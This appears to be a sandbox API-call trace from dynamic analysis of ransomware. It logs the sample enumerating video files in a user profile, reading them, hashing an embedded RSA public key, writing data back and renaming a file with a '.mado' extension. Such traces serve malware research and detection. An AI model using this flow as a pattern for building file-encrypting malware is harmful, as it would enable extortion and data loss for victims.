(HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b00 [0206.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ab8 [0206.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ad0 [0206.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79aa0 [0206.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b18 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ae8 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b30 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ab8 | out: hHeap=0x2c0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ab8 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b00 | out: hHeap=0x2c0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72c98 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b30 | out: hHeap=0x2c0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72ec8 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72b80 [0206.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ab8 | out: hHeap=0x2c0000) returned 1 [0206.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0206.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ae8 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b18 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ad0 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79aa0 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a88 | out: hHeap=0x2c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66f60 | out: hHeap=0x2c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.191] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x16f9a, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x16f9a, lpOverlapped=0x0) returned 1 [0206.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0206.191] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16f9f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.191] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0206.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.192] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.192] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.192] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.192] CloseHandle (hObject=0x63c) returned 1 [0206.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b7b950 [0206.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.194] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\oCeAcW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\oceacw.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\oCeAcW.flv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\oceacw.flv.mado")) returned 1 [0206.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.194] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0206.195] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccff23a0, ftCreationTime.dwHighDateTime=0x1d5dd51, ftLastAccessTime.dwLowDateTime=0x806e3500, ftLastAccessTime.dwHighDateTime=0x1d5e4d9, ftLastWriteTime.dwLowDateTime=0x806e3500, ftLastWriteTime.dwHighDateTime=0x1d5e4d9, nFileSizeHigh=0x0, nFileSizeLow=0xa016, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZWjQZfNN6ujr51vgjP5x.avi", cAlternateFileName="ZWJQZF~1.AVI")) returned 1 [0206.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0206.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.196] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\ZWjQZfNN6ujr51vgjP5x.avi") returned=".avi" [0206.196] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\ZWjQZfNN6ujr51vgjP5x.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\zwjqzfnn6ujr51vgjp5x.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.196] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=40982) returned 1 [0206.196] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.198] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x9ff0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.198] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.200] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.200] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xa016, lpOverlapped=0x0) returned 1 [0206.201] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.201] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.201] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.201] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0206.202] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.202] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.202] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.202] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.202] GetLastError () returned 0x0 [0206.202] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.202] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0206.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.202] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.202] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.202] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa020) returned 0x3b81690 [0206.202] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66f60 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a88 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66fa8 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79aa0 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ad0 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b18 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ae8 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0206.203] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ad0 | out: hHeap=0x2c0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ae8 | out: hHeap=0x2c0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b18 | out: hHeap=0x2c0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b18 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0206.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79ae8 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79ad0 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72db0 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72ec8 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ae8 | out: hHeap=0x2c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ad0 | out: hHeap=0x2c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b18 | out: hHeap=0x2c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.204] GetCurrentThreadId () returned 0x600 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32ff748 [0206.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 